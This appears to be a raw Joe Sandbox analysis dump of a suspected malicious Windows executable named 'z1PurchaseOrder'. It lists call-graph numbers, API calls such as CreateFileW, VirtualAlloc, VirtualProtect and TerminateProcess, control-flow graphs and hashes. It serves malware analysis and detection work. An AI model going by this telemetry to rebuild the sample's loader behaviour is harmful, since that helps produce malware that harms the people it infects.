API calls 90394->90395 90396 423615 90395->90396 90396->90296 90397->90293 90402 414cef GetSystemTimeAsFileTime __aulldiv 90399->90402 90401 4431ef 90401->89888 90402->90401 90403->89895 90405->89901 90410 4523e1 _wcscpy 90406->90410 90407 44afdc GetSystemTimeAsFileTime 90407->90410 90408 4151b0 81 API calls __fread_nolock 90408->90410 90409 452553 90409->89810 90409->89811 90410->90407 90410->90408 90410->90409 90411 41557c 105 API calls _fseek 90410->90411 90411->90410 90413 44b1b4 90412->90413 90414 44b1a6 90412->90414 90416 44b1ca 90413->90416 90417 44b1c2 90413->90417 90418 414e06 138 API calls 90413->90418 90415 414e06 138 API calls 90414->90415 90415->90413 90447 4352d1 81 API calls 2 library calls 90416->90447 90417->89838 90420 44b2c1 90418->90420 90420->90416 90421 44b2cf 90420->90421 90423 44b2dc 90421->90423 90426 414e94 __fcloseall 106 API calls 90421->90426 90422 44b20d 90424 44b211 90422->90424 90425 44b23b 90422->90425 90423->89838 90428 44b21e 90424->90428 90430 414e94 __fcloseall 106 API calls 90424->90430 90448 43526e 90425->90448 90426->90423 90431 44b22e 90428->90431 90434 414e94 __fcloseall 106 API calls 90428->90434 90429 44b242 90432 44b270 90429->90432 90433 44b248 90429->90433 90430->90428 90431->89838 90458 44b0af 111 API calls 90432->90458 90435 44b255 90433->90435 90438 414e94 __fcloseall 106 API calls 90433->90438 90434->90431 90439 44b265 90435->90439 90441 414e94 __fcloseall 106 API calls 90435->90441 90437 44b276 90459 43522c 67 API calls __mtinitlocknum 90437->90459 90438->90435 90439->89838 90441->90439 90442 44b27c 90443 44b289 90442->90443 90444 414e94 __fcloseall 106 API calls 90442->90444 90445 44b299 90443->90445 90446 414e94 __fcloseall 106 API calls 90443->90446 90444->90443 90445->89838 90446->90445 90447->90422 90449 4138ba _malloc 67 API calls 90448->90449 90450 43527d 90449->90450 90451 4138ba _malloc 67 API calls 90450->90451 90452 43528d 90451->90452 90453 4138ba _malloc 67 API calls 90452->90453 90454 43529d 90453->90454 90457 4352bc 90454->90457 90460 43522c 67 API calls __mtinitlocknum 90454->90460 90456 4352c8 90456->90429 90457->90429 90458->90437 90459->90442 90460->90456 90461->89716 90463 410148 SHGetDesktopFolder 90462->90463 90466 4101a3 _wcscpy 90462->90466 90464 41015a _wcscpy 90463->90464 90463->90466 90465 41018a SHGetPathFromIDListW 90464->90465 90464->90466 90465->90466 90466->89720 90467->89722 90469 40f5e0 152 API calls 90468->90469 90470 40f417 90469->90470 90471 42ca37 90470->90471 90472 40f42c 90470->90472 90473 42ca1f 90470->90473 90474 452574 140 API calls 90471->90474 90506 4037e0 139 API calls 7 library calls 90472->90506 90507 43717f 110 API calls _printf 90473->90507 90475 42ca50 90474->90475 90478 42ca76 90475->90478 90479 42ca54 90475->90479 90483 41171a 75 API calls 90478->90483 90482 434fe1 106 API calls 90479->90482 90480 40f446 90480->89719 90481 42ca2d 90481->90471 90484 42ca5e 90482->90484 90498 42cacc ctype 90483->90498 90508 43717f 110 API calls _printf 90484->90508 90486 42ca6c 90486->90478 90487 42ccc3 90488 413a88 __mtinitlocknum 67 API calls 90487->90488 90489 42cccd 90488->90489 90490 434fe1 106 API calls 90489->90490 90491 42ccda 90490->90491 90495 401b70 75 API calls 90495->90498 90498->90487 90498->90495 90499 402cc0 75 API calls 2 library calls 90498->90499 90500 4026a0 90498->90500 90509 445051 75 API calls _realloc 90498->90509 90510 44c80c 87 API calls 3 library calls 90498->90510 90511 44b408 75 API calls 90498->90511 90499->90498 90501 40276b 90500->90501 90502 4026af 90500->90502 90501->90498 90502->90501 90503 41171a 75 API calls 90502->90503 90504 4026ee ctype 90502->90504 90503->90504 90504->90501 90505 41171a 75 API calls 90504->90505 90505->90504 90506->90480 90507->90481 90508->90486 90509->90498 90510->90498 90511->90498 90512->89729 90513->89730 90514 444343 90517 444326 90514->90517 90516 44434e WriteFile 90518 444340 90517->90518 90519 4442c7 90517->90519 90518->90516 90524 40e190 SetFilePointerEx 90519->90524 90521 4442e0 SetFilePointerEx 90525 40e190 SetFilePointerEx 90521->90525 90523 4442ff 90523->90516 90524->90521 90525->90523 90737 431914 90738 431920 90737->90738 90739 431928 90738->90739 90740 43193d 90738->90740 91001 45e62e 116 API calls 3 library calls 90739->91001 91002 47f2b4 174 API calls 90740->91002 90743 43194a 90746 4095b0 ctype 90743->90746 91003 45e62e 116 API calls 3 library calls 90743->91003 90744 409708 90746->90744 90748 4097af 90746->90748 90750 4315b8 WaitForSingleObject 90746->90750 90753 431623 Sleep 90746->90753 90759 40986e Sleep 90746->90759 90760 4098f1 TranslateMessage DispatchMessageW 90746->90760 90776 409894 90746->90776 90778 45e62e 116 API calls 90746->90778 90780 4319c9 VariantClear 90746->90780 90781 4092c0 VariantClear 90746->90781 90783 40b380 90746->90783 90807 409340 90746->90807 90840 409030 90746->90840 90854 40d300 90746->90854 90859 40d320 90746->90859 90865 409a40 90746->90865 91004 40e380 VariantClear ctype 90746->91004 90748->90744 90988 40d590 VariantClear 90748->90988 90750->90746 90752 4315d6 GetExitCodeProcess CloseHandle 90750->90752 90992 40d590 VariantClear 90752->90992 90756 43163b timeGetTime 90753->90756 90753->90776 90756->90776 90761 409880 timeGetTime 90759->90761 90759->90776 90760->90746 90761->90776 90762 431673 CloseHandle 90762->90776 90763 43170c GetExitCodeProcess CloseHandle 90763->90776 90764 40d590 VariantClear 90764->90776 90765 46dd22 133 API calls 90765->90776 90767 46e641 134 API calls 90767->90776 90769 431781 Sleep 90769->90746 90776->90746 90776->90762 90776->90763 90776->90764 90776->90765 90776->90767 90776->90769 90779 4092c0 VariantClear 90776->90779 90989 447e59 75 API calls 90776->90989 90990 453b07 77 API calls 90776->90990 90991 4646a2 76 API calls 90776->90991 90993 444233 88 API calls _wcslen 90776->90993 90994 457509 VariantClear 90776->90994 90995 404120 90776->90995 90999 4717e3 VariantClear 90776->90999 91000 436272 6 API calls 90776->91000 90778->90746 90779->90776 90780->90746 90781->90746 90784 40b3a5 90783->90784 90785 40b53d 90783->90785 90786 430a99 90784->90786 90789 40b3b6 90784->90789 91005 45e62e 116 API calls 3 library calls 90785->91005 91006 45e62e 116 API calls 3 library calls 90786->91006 90791 430aae 90789->90791 90795 40b3f2 90789->90795 90806 40b4fd ctype 90789->90806 90793 4092c0 VariantClear 90791->90793 90792 430dc9 90792->90792 90794 40b528 90793->90794 90794->90746 90796 40b429 90795->90796 90797 40b476 ctype 90795->90797 90799 430ae9 VariantClear 90795->90799 90804 40b43b ctype 90796->90804 91007 40e380 VariantClear ctype 90796->91007 90798 40b4eb 90797->90798 90801 430d08 ctype 90797->90801 90798->90806 91008 40e380 VariantClear ctype 90798->91008 90799->90804 90800 430d41 VariantClear 90800->90806 90801->90800 90801->90806 90804->90797 90805 41171a 75 API calls 90804->90805 90805->90797 90806->90794 91009 45e62e 116 API calls 3 library calls 90806->91009 90808 409386 90807->90808 90829 409395 90807->90829 91010 4042f0 75 API calls __cinit 90808->91010 90811 42fba9 91014 45e62e 116 API calls 3 library calls 90811->91014 90813 42fc07 91016 45e62e 116 API calls 3 library calls 90813->91016 90816 42fc85 91018 4781ae 140 API calls 90816->91018 90818 42fd4f 90822 4092c0 VariantClear 90818->90822 90819 42fcd8 91020 47f2b4 174 API calls 90819->91020 90820 42fc9c 90825 409484 ctype 90820->90825 91019 45e62e 116 API calls 3 library calls 90820->91019 90821 42fd39 91022 45e62e 116 API calls 3 library calls 90821->91022 90822->90825 90825->90746 90826 42fce9 90826->90825 91021 45e62e 116 API calls 3 library calls 90826->91021 90828 40946f 91011 409210 VariantClear 90828->91011 90829->90811 90829->90813 90829->90816 90829->90818 90829->90819 90829->90821 90829->90825 90829->90828 90830 4094c1 90829->90830 90833 40947b 90829->90833 90837 4092c0 VariantClear 90829->90837 91013 453155 75 API calls 90829->91013 91015 40c620 118 API calls 90829->91015 91017 45e62e 116 API calls 3 library calls 90829->91017 90830->90825 91012 404260 76 API calls 90830->91012 90835 4092c0 VariantClear 90833->90835 90835->90825 90837->90829 90838 4094e1 90839 4092c0 VariantClear 90838->90839 90839->90825 91023 409110 117 API calls 90840->91023 90842 42ceb6 91033 410ae0 VariantClear ctype 90842->91033 90844 40906e 90844->90842 90846 42cea9 90844->90846 90848 4090a4 90844->90848 90845 42cebf 91032 45e62e 116 API calls 3 library calls 90846->91032 91024 404160 90848->91024 90851 4090f0 ctype 90851->90746 90852 4092c0 VariantClear 90853 4090be ctype 90852->90853 90853->90851 90853->90852 90855 4292e3 90854->90855 90856 40d30c 90854->90856 90857 429323 90855->90857 90858 4292fd TranslateAcceleratorW 90855->90858 90856->90746 90857->90746 90858->90856 90860 4296d0 90859->90860 90863 40d32f 90859->90863 90860->90746 90861 42972a IsDialogMessageW 90862 40d33c 90861->90862 90861->90863 90862->90746 90863->90861 90863->90862 91168 4340ec GetClassLongW 90863->91168 90866 409a66 _wcslen 90865->90866 90867 41171a 75 API calls 90866->90867 90927 40aade _realloc ctype 90866->90927 90868 409a9c _realloc 90867->90868 90870 41171a 75 API calls 90868->90870 90872 409abd 90870->90872 90871 42cee9 90873 41171a 75 API calls 90871->90873 90874 409aeb CharUpperBuffW 90872->90874 90876 409b09 ctype 90872->90876 90872->90927 90882 42cf10 _realloc 90873->90882 90874->90876 90913 409b88 ctype 90876->90913 91171 47d10e 150 API calls 90876->91171 90878 4092c0 VariantClear 90879 42e5e0 90878->90879 91203 410ae0 VariantClear ctype 90879->91203 90881 42e5f2 91202 45e62e 116 API calls 3 library calls 90882->91202 90883 409e4a 90883->90882 90885 41171a 75 API calls 90883->90885 90890 409ea4 90883->90890 90884 40aa5b 90887 41171a 75 API calls 90884->90887 90885->90890 90886 41171a 75 API calls 90886->90913 90904 40aa81 _realloc ctype 90887->90904 90889 409ed0 90893 42d50d 90889->90893 90949 409ef8 _realloc ctype 90889->90949 91181 40b800 VariantClear VariantClear ctype 90889->91181 90890->90889 90891 41171a 75 API calls 90890->90891 90892 42d480 90891->90892 90895 42d491 90892->90895 91177 44b3f6 75 API calls 90892->91177 90898 42d527 90893->90898 91182 40b800 VariantClear VariantClear ctype 90893->91182 90894 42d195 VariantClear 90894->90913 91178 40df50 75 API calls 90895->91178 90897 40a3a7 90902 40a415 90897->90902 90950 42db5c 90897->90950 90898->90949 91183 40e2e0 VariantClear ctype 90898->91183 90899 4092c0 VariantClear 90899->90913 90907 41171a 75 API calls 90902->90907 90912 41171a 75 API calls 90904->90912 90921 40a41c 90907->90921 90910 42db96 91189 45e62e 116 API calls 3 library calls 90910->91189 90912->90927 90913->90882 90913->90883 90913->90884 90913->90886 90913->90894 90913->90899 90913->90904 90916 42d128 90913->90916 90917 42d20c 90913->90917 90925 42dbb9 90913->90925 91172 40c3e0 75 API calls 90913->91172 91173 40c620 118 API calls 90913->91173 91175 40be00 75 API calls 2 library calls 90913->91175 91176 40e380 VariantClear ctype 90913->91176 90914 42d4a6 91179 4530b3 75 API calls 90914->91179 90919 4092c0 VariantClear 90916->90919 90917->90746 90918 42d4d7 91180 4530b3 75 API calls 90918->91180 90922 42d131 90919->90922 90934 40a481 90921->90934 91190 40c8a0 VariantClear ctype 90921->91190 91174 410ae0 VariantClear ctype 90922->91174 90925->90878 91170 401380 75 API calls 90927->91170 90930 402cc0 75 API calls 90930->90949 90931 40aa22 ctype 90931->90746 90932 4092c0 VariantClear 90952 40a534 _realloc ctype 90932->90952 90933 41171a 75 API calls 90933->90949 90935 40a4ed 90934->90935 90936 42dc1e VariantClear 90934->90936 90934->90952 90940 40a4ff ctype 90935->90940 91191 40e380 VariantClear ctype 90935->91191 90936->90940 90939 41171a 75 API calls 90939->90952 90940->90939 90940->90952 90944 44b3f6 75 API calls 90944->90949 90945 42deb6 VariantClear 90945->90952 90946 411421 74 API calls __cinit 90946->90949 90947 40a73c 90951 42e237 90947->90951 90958 40a76b 90947->90958 90948 40a053 90948->90746 90949->90897 90949->90910 90949->90927 90949->90930 90949->90933 90949->90944 90949->90946 90949->90948 90949->90950 91184 45ee98 75 API calls 90949->91184 91185 4019e0 76 API calls 90949->91185 91186 404260 76 API calls 90949->91186 91187 409210 VariantClear 90949->91187 91188 4721e5 VariantClear 90950->91188 91195 46e709 VariantClear VariantClear ctype 90951->91195 90952->90932 90952->90945 90952->90947 90952->90951 90953 42df47 VariantClear 90952->90953 90954 42dfe9 VariantClear 90952->90954 90957 40e380 VariantClear 90952->90957 90962 41171a 75 API calls 90952->90962 90963 41171a 75 API calls 90952->90963 91192 46e9cd 75 API calls 90952->91192 91193 409210 VariantClear 90952->91193 91194 44cc6c VariantClear ctype 90952->91194 90953->90952 90954->90952 90956 40a7a2 90968 40a7ad ctype 90956->90968 91196 40b800 VariantClear VariantClear ctype 90956->91196 90957->90952 90958->90956 90981 40a800 ctype 90958->90981 91169 40b800 VariantClear VariantClear ctype 90958->91169 90961 42e312 90966 42e337 VariantClear 90961->90966 90975 40a8c2 ctype 90961->90975 90962->90952 90965 42dd10 VariantInit VariantCopy 90963->90965 90964 40a8b0 90964->90975 91198 40e380 VariantClear ctype 90964->91198 90965->90952 90967 42dd30 VariantClear 90965->90967 90966->90975 90967->90952 90970 40a7ee 90968->90970 90973 42e2a7 VariantClear 90968->90973 90968->90981 90970->90981 91197 40e380 VariantClear ctype 90970->91197 90971 42e3b2 90976 42e3da VariantClear 90971->90976 90982 40a91a ctype 90971->90982 90973->90981 90974 40a908 90974->90982 91199 40e380 VariantClear ctype 90974->91199 90975->90971 90975->90974 90976->90982 90977 42e47f 90983 42e4a3 VariantClear 90977->90983 90987 40a957 ctype 90977->90987 90979 40a945 90979->90987 91200 40e380 VariantClear ctype 90979->91200 90981->90961 90981->90964 90982->90977 90982->90979 90983->90987 90985 42e559 VariantClear 90985->90987 90987->90931 90987->90985 91201 40e380 VariantClear ctype 90987->91201 90988->90744 90989->90776 90990->90776 90991->90776 90992->90776 90993->90776 90994->90776 90996 40412e 90995->90996 90997 4092c0 VariantClear 90996->90997 90998 404138 90997->90998 90998->90769 90999->90776 91000->90776 91001->90746 91002->90743 91003->90746 91004->90746 91005->90786 91006->90791 91007->90804 91008->90806 91009->90792 91010->90829 91011->90833 91012->90838 91013->90829 91014->90825 91015->90829 91016->90825 91017->90829 91018->90820 91019->90825 91020->90826 91021->90825 91022->90818 91023->90844 91025 4092c0 VariantClear 91024->91025 91026 40416e 91025->91026 91027 404120 VariantClear 91026->91027 91028 40419b 91027->91028 91034 4734b7 91028->91034 91078 40efe0 91028->91078 91029 4041c6 91029->90842 91029->90853 91032->90842 91033->90845 91035 453063 111 API calls 91034->91035 91036 4734d7 91035->91036 91037 473545 91036->91037 91038 47350c 91036->91038 91086 463c42 91037->91086 91040 4092c0 VariantClear 91038->91040 91045 473514 91040->91045 91041 473558 91042 47355c 91041->91042 91058 473595 91041->91058 91044 4092c0 VariantClear 91042->91044 91043 473616 91099 463d7e 91043->91099 91054 473564 91044->91054 91045->91029 91047 453063 111 API calls 91047->91058 91048 473622 91049 473697 91048->91049 91050 47362c 91048->91050 91133 457838 91049->91133 91053 4092c0 VariantClear 91050->91053 91056 473634 91053->91056 91054->91029 91056->91029 91057 473655 91060 4092c0 VariantClear 91057->91060 91058->91043 91058->91047 91058->91057 91145 462f5a 87 API calls __wcsicoll 91058->91145 91072 47365d 91060->91072 91062 4736b0 91146 45e62e 116 API calls 3 library calls 91062->91146 91063 4736c9 91147 40e7e0 76 API calls 91063->91147 91066 4736ba GetCurrentProcess TerminateProcess 91066->91063 91067 4736db 91076 4736ff 91067->91076 91148 40d030 76 API calls 91067->91148 91069 473731 91074 473744 FreeLibrary 91069->91074 91075 47374b 91069->91075 91070 4736f1 91149 46b945 134 API calls 2 library calls 91070->91149 91072->91029 91074->91075 91075->91029 91076->91069 91150 40d030 76 API calls 91076->91150 91151 46b945 134 API calls 2 library calls 91076->91151 91079 40eff5 CreateFileW 91078->91079 91080 4299bf 91078->91080 91082 40f017 91079->91082 91081 4299c4 CreateFileW 91080->91081 91080->91082 91081->91082 91083 4299ea 91081->91083 91082->91029 91167 40e0d0 SetFilePointerEx SetFilePointerEx 91083->91167 91085 4299f5 91085->91082 91152 45335b 76 API calls 91086->91152 91088 463c5d 91153 442c52 80 API calls _wcslen 91088->91153 91090 463c72 91092 40c060 75 API calls 91090->91092 91098 463cac 91090->91098 91093 463c8e 91092->91093 91154 4608ce 75 API calls _realloc 91093->91154 91094 463cf7 91094->91041 91096 463ca4 91097 40c740 75 API calls 91096->91097 91097->91098 91098->91094 91155 462f5a 87 API calls __wcsicoll 91098->91155 91100 453063 111 API calls 91099->91100 91101 463d99 91100->91101 91102 463de0 91101->91102 91103 463dca 91101->91103 91157 40c760 78 API calls 91102->91157 91156 453081 111 API calls 91103->91156 91106 463dd0 LoadLibraryW 91108 463e09 91106->91108 91107 463de7 91121 463e19 91107->91121 91158 40c760 78 API calls 91107->91158 91110 463e3e 91108->91110 91108->91121 91113 463e4e 91110->91113 91114 463e7b 91110->91114 91111 463dfb 91111->91121 91159 40c760 78 API calls 91111->91159 91160 40d500 75 API calls 91113->91160 91162 40c760 78 API calls 91114->91162 91117 463e57 91161 45efe7 77 API calls ctype 91117->91161 91118 463e82 GetProcAddress 91122 463e90 91118->91122 91120 463e62 GetProcAddress 91124 463e79 91120->91124 91121->91048 91122->91121 91123 463edf 91122->91123 91122->91124 91123->91121 91126 463eef FreeLibrary 91123->91126 91124->91122 91163 403470 75 API calls _realloc 91124->91163 91126->91121 91127 463eb4 91164 40d500 75 API calls 91127->91164 91129 463ebd 91165 45efe7 77 API calls ctype 91129->91165 91131 463ec8 GetProcAddress 91166 401330 ctype 91131->91166 91134 457a4c 91133->91134 91140 45785f _strcat _wcslen _wcscpy ctype 91133->91140 91141 410d40 91134->91141 91135 40c760 78 API calls 91135->91140 91136 443576 78 API calls 91136->91140 91137 4138ba 67 API calls _malloc 91137->91140 91138 453081 111 API calls 91138->91140 91139 40f580 77 API calls 91139->91140 91140->91134 91140->91135 91140->91136 91140->91137 91140->91138 91140->91139 91143 410d55 91141->91143 91142 410ded VirtualProtect 91144 410dbb 91142->91144 91143->91142 91143->91144 91144->91062 91144->91063 91145->91058 91146->91066 91147->91067 91148->91070 91149->91076 91150->91076 91151->91076 91152->91088 91153->91090 91154->91096 91155->91094 91156->91106 91157->91107 91158->91111 91159->91108 91160->91117 91161->91120 91162->91118 91163->91127 91164->91129 91165->91131 91166->91123 91167->91085 91168->90863 91169->90956 91170->90871 91171->90876 91172->90913 91173->90913 91174->90931 91175->90913 91176->90913 91177->90895 91178->90914 91179->90918 91180->90889 91181->90893 91182->90898 91183->90949 91184->90949 91185->90949 91186->90949 91187->90949 91188->90910 91189->90925 91190->90921 91191->90940 91192->90952 91193->90952 91194->90952 91195->90956 91196->90968 91197->90981 91198->90975 91199->90982 91200->90987 91201->90987 91202->90925 91203->90881 90526 46d22f 90529 46d098 90526->90529 90528 46d241 90530 46d0b5 90529->90530 90531 46d115 90530->90531 90532 46d0b9 90530->90532 90584 45c216 78 API calls 90531->90584 90534 41171a 75 API calls 90532->90534 90535 46d0c0 90534->90535 90537 46d0cc 90535->90537 90577 40d940 76 API calls 90535->90577 90536 46d126 90538 46d0f8 90536->90538 90544 46d142 90536->90544 90578 453063 90537->90578 90540 4092c0 VariantClear 90538->90540 90542 46d0fd 90540->90542 90542->90528 90545 46d1c8 90544->90545 90548 46d158 90544->90548 90590 4676a3 78 API calls 90545->90590 90551 453063 111 API calls 90548->90551 90549 46d0ea 90549->90544 90552 46d0ee 90549->90552 90550 46d1ce 90591 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 90550->90591 90560 46d15e 90551->90560 90552->90538 90583 44ade5 CloseHandle ctype 90552->90583 90553 46d18d 90585 467fce 82 API calls 90553->90585 90557 46d196 90586 4013a0 75 API calls 90557->90586 90558 46d1e7 90562 4092c0 VariantClear 90558->90562 90565 46d194 90558->90565 90560->90553 90560->90557 90561 46d1a2 90587 40df50 75 API calls 90561->90587 90562->90565 90564 46d1ac 90588 40d3b0 75 API calls 2 library calls 90564->90588 90567 46d224 90565->90567 90573 40d900 90565->90573 90567->90528 90568 46d1b8 90589 467fce 82 API calls 90568->90589 90571 46d216 90592 44ade5 CloseHandle ctype 90571->90592 90574 40d917 90573->90574 90575 40d909 90573->90575 90574->90575 90576 40d91c CloseHandle 90574->90576 90575->90571 90576->90571 90577->90537 90579 45306e 90578->90579 90580 45307a 90578->90580 90579->90580 90593 452e2a 111 API calls 5 library calls 90579->90593 90582 40dfa0 83 API calls 90580->90582 90582->90549 90583->90538 90584->90536 90585->90565 90586->90561 90587->90564 90588->90568 90589->90565 90590->90550 90591->90558 90592->90567 90593->90580 91204 42919b 91209 40ef10 91204->91209 91207 411421 __cinit 74 API calls 91208 4291aa 91207->91208 91210 41171a 75 API calls 91209->91210 91211 40ef17 91210->91211 91212 42ad48 91211->91212 91217 40ef40 74 API calls __cinit 91211->91217 91214 40ef2a 91218 40e470 91214->91218 91217->91214 91219 40c060 75 API calls 91218->91219 91220 40e483 GetVersionExW 91219->91220 91221 4021e0 75 API calls 91220->91221 91222 40e4bb 91221->91222 91244 40e600 91222->91244 91228 42accc 91230 42ad28 GetSystemInfo 91228->91230 91233 42ad38 GetSystemInfo 91230->91233 91231 40e557 GetCurrentProcess 91264 40ee30 LoadLibraryA GetProcAddress 91231->91264 91232 40e56c 91232->91233 91257 40eee0 91232->91257 91237 40e5c9 91261 40eea0 91237->91261 91240 40e5e0 91242 40e5f1 FreeLibrary 91240->91242 91243 40e5f4 91240->91243 91241 40e5dd FreeLibrary 91241->91240 91242->91243 91243->91207 91245 40e60b 91244->91245 91246 40c740 75 API calls 91245->91246 91247 40e4c2 91246->91247 91248 40e620 91247->91248 91249 40e62a 91248->91249 91250 42ac93 91249->91250 91251 40c740 75 API calls 91249->91251 91252 40e4ce 91251->91252 91252->91228 91253 40ee70 91252->91253 91254 40e551 91253->91254 91255 40ee76 LoadLibraryA 91253->91255 91254->91231 91254->91232 91255->91254 91256 40ee87 GetProcAddress 91255->91256 91256->91254 91258 40e5bf 91257->91258 91259 40eee6 LoadLibraryA 91257->91259 91258->91230 91258->91237 91259->91258 91260 40eef7 GetProcAddress 91259->91260 91260->91258 91265 40eec0 LoadLibraryA GetProcAddress 91261->91265 91263 40e5d3 GetNativeSystemInfo 91263->91240 91263->91241 91264->91232 91265->91263 91266 42e89e 91273 40c000 91266->91273 91268 42e8ac 91269 409a40 165 API calls 91268->91269 91270 42e8ca 91269->91270 91284 44b92e VariantClear 91270->91284 91272 42f3ae 91274 40c014 91273->91274 91275 40c007 91273->91275 91277 40c01a 91274->91277 91278 40c02c 91274->91278 91285 409210 VariantClear 91275->91285 91286 409210 VariantClear 91277->91286 91280 41171a 75 API calls 91278->91280 91283 40c033 91280->91283 91281 40c00f 91281->91268 91282 40c023 91282->91268 91283->91268 91284->91272 91285->91281 91286->91282 90594 40116e 90595 401119 DefWindowProcW 90594->90595 91287 40f4610 91301 40f2260 91287->91301 91289 40f46c1 91304 40f4500 91289->91304 91291 40f46ea CreateFileW 91293 40f473e 91291->91293 91294 40f4739 91291->91294 91293->91294 91295 40f4755 VirtualAlloc 91293->91295 91295->91294 91296 40f4773 ReadFile 91295->91296 91296->91294 91297 40f478e 91296->91297 91298 40f3500 13 API calls 91297->91298 91299 40f47c1 91298->91299 91300 40f47e4 ExitProcess 91299->91300 91300->91294 91303 40f28eb 91301->91303 91307 40f56f0 GetPEB 91301->91307 91303->91289 91305 40f4509 Sleep 91304->91305 91306 40f4517 91305->91306 91307->91303
                                        APIs
                                        • _wcslen.LIBCMT ref: 00409A61
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID: 0vH$4RH
                                        • API String ID: 1143807570-2085553193
                                        • Opcode ID: 871ee0cf3e7049cfc52ffc1c0c6a20d390630c46fc92d40781a439c75a0ca281
                                        • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                        • Opcode Fuzzy Hash: 871ee0cf3e7049cfc52ffc1c0c6a20d390630c46fc92d40781a439c75a0ca281
                                        • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1266 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1275 40e506-40e509 1266->1275 1276 42accc-42acd1 1266->1276 1279 40e540-40e555 call 40ee70 1275->1279 1280 40e50b-40e51c 1275->1280 1277 42acd3-42acdb 1276->1277 1278 42acdd-42ace0 1276->1278 1281 42ad12-42ad20 1277->1281 1282 42ace2-42aceb 1278->1282 1283 42aced-42acf0 1278->1283 1297 40e557-40e573 GetCurrentProcess call 40ee30 1279->1297 1298 40e579-40e5a8 1279->1298 1284 40e522-40e525 1280->1284 1285 42ac9b-42aca7 1280->1285 1296 42ad28-42ad2d GetSystemInfo 1281->1296 1282->1281 1283->1281 1287 42acf2-42ad06 1283->1287 1284->1279 1288 40e527-40e537 1284->1288 1290 42acb2-42acba 1285->1290 1291 42aca9-42acad 1285->1291 1292 42ad08-42ad0c 1287->1292 1293 42ad0e 1287->1293 1294 42acbf-42acc7 1288->1294 1295 40e53d 1288->1295 1290->1279 1291->1279 1292->1281 1293->1281 1294->1279 1295->1279 1299 42ad38-42ad3d GetSystemInfo 1296->1299 1297->1298 1307 40e575 1297->1307 1298->1299 1300 40e5ae-40e5c3 call 40eee0 1298->1300 1300->1296 1306 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1300->1306 1310 40e5e0-40e5ef 1306->1310 1311 40e5dd-40e5de FreeLibrary 1306->1311 1307->1298 1312 40e5f1-40e5f2 FreeLibrary 1310->1312 1313 40e5f4-40e5ff 1310->1313 1311->1310 1312->1313
                                        APIs
                                        • GetVersionExW.KERNEL32 ref: 0040E495
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                        • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                        • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                        • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                        • String ID: pMH
                                        • API String ID: 2923339712-2522892712
                                        • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                        • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                        • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                        • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                        APIs
                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
